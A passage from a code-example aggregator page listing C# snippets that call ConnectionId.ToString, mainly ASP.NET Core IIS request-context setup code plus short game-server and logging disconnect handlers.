                Scheme      = SslStatus != SslStatus.Insecure ? Constants.HttpsScheme : Constants.HttpScheme;
                KnownMethod = VerbId;

                var originalPath = RequestUriBuilder.DecodeAndUnescapePath(GetRawUrlInBytes());

                // TODO: Read this from IIS config
                // See https://github.com/aspnet/IISIntegration/issues/427
                var prefix = "/";
                if (KnownMethod == HttpApiTypes.HTTP_VERB.HttpVerbOPTIONS && string.Equals(RawTarget, "*", StringComparison.Ordinal))
                    PathBase = string.Empty;
                    Path     = string.Empty;
                // These paths are both unescaped already.
                else if (originalPath.Length == prefix.Length - 1)
                    // They matched exactly except for the trailing slash.
                    PathBase = originalPath;
                    Path     = string.Empty;
                    // url: /base/path, prefix: /base/, base: /base, path: /path
                    // url: /, prefix: /, base: , path: /
                    PathBase = originalPath.Substring(0, prefix.Length - 1);
                    Path     = originalPath.Substring(prefix.Length - 1);

                var cookedUrl = GetCookedUrl();
                QueryString = cookedUrl.GetQueryString() ?? string.Empty;

                // TODO: Avoid using long.ToString, it's pretty slow
                RequestConnectionId = ConnectionId.ToString(CultureInfo.InvariantCulture);

                // Copied from WebListener
                // This is the base GUID used by HTTP.SYS for generating the activity ID.
                // HTTP.SYS overwrites the first 8 bytes of the base GUID with RequestId to generate ETW activity ID.
                // The requestId should be set by the NativeRequestContext
                var guid = new Guid(0xffcb4c93, 0xa57f, 0x453c, 0xb6, 0x3f, 0x84, 0x71, 0xc, 0x79, 0x67, 0xbb);
                *((ulong *)&guid) = RequestId;

                // TODO: Also make this not slow
                TraceIdentifier = guid.ToString();

                var localEndPoint = GetLocalEndPoint();
                LocalIpAddress = localEndPoint.GetIPAddress();
                LocalPort      = localEndPoint.GetPort();

                var remoteEndPoint = GetRemoteEndPoint();
                RemoteIpAddress = remoteEndPoint.GetIPAddress();
                RemotePort      = remoteEndPoint.GetPort();
                StatusCode      = 200;

                RequestHeaders      = new RequestHeaders(this);
                HttpResponseHeaders = new HeaderCollection(); // TODO Optimize for known headers
                ResponseHeaders     = HttpResponseHeaders;


            RequestBody  = new IISHttpRequestBody(this);
            ResponseBody = new IISHttpResponseBody(this);

            Input = _pipeFactory.Create(new PipeOptions {
                ReaderScheduler = TaskRunScheduler.Default
            var pipe = _pipeFactory.Create(new PipeOptions {
                ReaderScheduler = TaskRunScheduler.Default

            Output = new OutputProducer(pipe);
コード例 #23
 public override string ToString()
コード例 #24
 /// <summary>
 /// 切断時
 /// </summary>
 /// <returns></returns>
 public async Task LeaveAsync()
     // マッチングから外す
     await matchingRoom.RemoveAsync(Context);
コード例 #25
 void Server_OnDisconnection(ConnectionId connectionId)
     Debug.Log("Client: " + connectionId.ToString() + " disconnected");
コード例 #26
        internal unsafe IISHttpContext(MemoryPool <byte> memoryPool, IntPtr pInProcessHandler, IISOptions options, IISHttpServer server)
            : base((HttpApiTypes.HTTP_REQUEST *)NativeMethods.http_get_raw_request(pInProcessHandler))
            _thisHandle = GCHandle.Alloc(this);

            _memoryPool        = memoryPool;
            _pInProcessHandler = pInProcessHandler;
            _server            = server;

            NativeMethods.http_set_managed_context(pInProcessHandler, (IntPtr)_thisHandle);
                Method = GetVerb();

                RawTarget = GetRawUrl();
                // TODO version is slow.
                HttpVersion = GetVersion();
                Scheme      = SslStatus != SslStatus.Insecure ? Constants.HttpsScheme : Constants.HttpScheme;
                KnownMethod = VerbId;

                var originalPath = RequestUriBuilder.DecodeAndUnescapePath(GetRawUrlInBytes());

                if (KnownMethod == HttpApiTypes.HTTP_VERB.HttpVerbOPTIONS && string.Equals(RawTarget, "*", StringComparison.Ordinal))
                    PathBase = string.Empty;
                    Path     = string.Empty;
                    // Path and pathbase are unescaped by RequestUriBuilder
                    // The UsePathBase middleware will modify the pathbase and path correctly
                    PathBase = string.Empty;
                    Path     = originalPath;

                var cookedUrl = GetCookedUrl();
                QueryString = cookedUrl.GetQueryString() ?? string.Empty;

                // TODO: Avoid using long.ToString, it's pretty slow
                RequestConnectionId = ConnectionId.ToString(CultureInfo.InvariantCulture);

                // Copied from WebListener
                // This is the base GUID used by HTTP.SYS for generating the activity ID.
                // HTTP.SYS overwrites the first 8 bytes of the base GUID with RequestId to generate ETW activity ID.
                // The requestId should be set by the NativeRequestContext
                var guid = new Guid(0xffcb4c93, 0xa57f, 0x453c, 0xb6, 0x3f, 0x84, 0x71, 0xc, 0x79, 0x67, 0xbb);
                *((ulong *)&guid) = RequestId;

                // TODO: Also make this not slow
                TraceIdentifier = guid.ToString();

                var localEndPoint = GetLocalEndPoint();
                LocalIpAddress = localEndPoint.GetIPAddress();
                LocalPort      = localEndPoint.GetPort();

                var remoteEndPoint = GetRemoteEndPoint();
                RemoteIpAddress = remoteEndPoint.GetIPAddress();
                RemotePort      = remoteEndPoint.GetPort();
                StatusCode      = 200;

                RequestHeaders      = new RequestHeaders(this);
                HttpResponseHeaders = new HeaderCollection();
                ResponseHeaders     = HttpResponseHeaders;

                if (options.ForwardWindowsAuthentication)
                    WindowsUser = GetWindowsPrincipal();
                    if (options.AutomaticAuthentication)
                        User = WindowsUser;


                // Check if the Http upgrade feature is available in IIS.
                // To check this, we can look at the server variable WEBSOCKET_VERSION
                // And see if there is a version. Same check that Katana did:
                // https://github.com/aspnet/AspNetKatana/blob/9f6e09af6bf203744feb5347121fe25f6eec06d8/src/Microsoft.Owin.Host.SystemWeb/OwinAppContext.cs#L125
                // Actively not locking here as acquiring a lock on every request will hurt perf more than checking the
                // server variables a few extra times if a bunch of requests hit the server at the same time.
                if (_websocketAvailability == WebsocketAvailabilityStatus.Uninitialized)
                    NativeMethods.http_get_server_variable(pInProcessHandler, WebSocketVersionString, out var webSocketsSupported);
                    var webSocketsAvailable = !string.IsNullOrEmpty(webSocketsSupported);
                    _websocketAvailability = webSocketsAvailable ?
                                             WebsocketAvailabilityStatus.Available :

                if (_websocketAvailability == WebsocketAvailabilityStatus.NotAvailable)
                    _currentIHttpUpgradeFeature = null;

            RequestBody  = new IISHttpRequestBody(this);
            ResponseBody = new IISHttpResponseBody(this);

            Input = new Pipe(new PipeOptions(_memoryPool, readerScheduler: PipeScheduler.ThreadPool, minimumSegmentSize: MinAllocBufferSize));
            var pipe = new Pipe(new PipeOptions(
                                    readerScheduler: PipeScheduler.ThreadPool,
                                    pauseWriterThreshold: PauseWriterThreshold,
                                    resumeWriterThreshold: ResumeWriterTheshold,
                                    minimumSegmentSize: MinAllocBufferSize));

            Output = new OutputProducer(pipe);
コード例 #27
 protected override void OnDisconnect(DisconnectReason reasonCode, string reasonDetail)
     LBLogger.Info(LogTag, "连接  关闭 " + ConnectionId.ToString());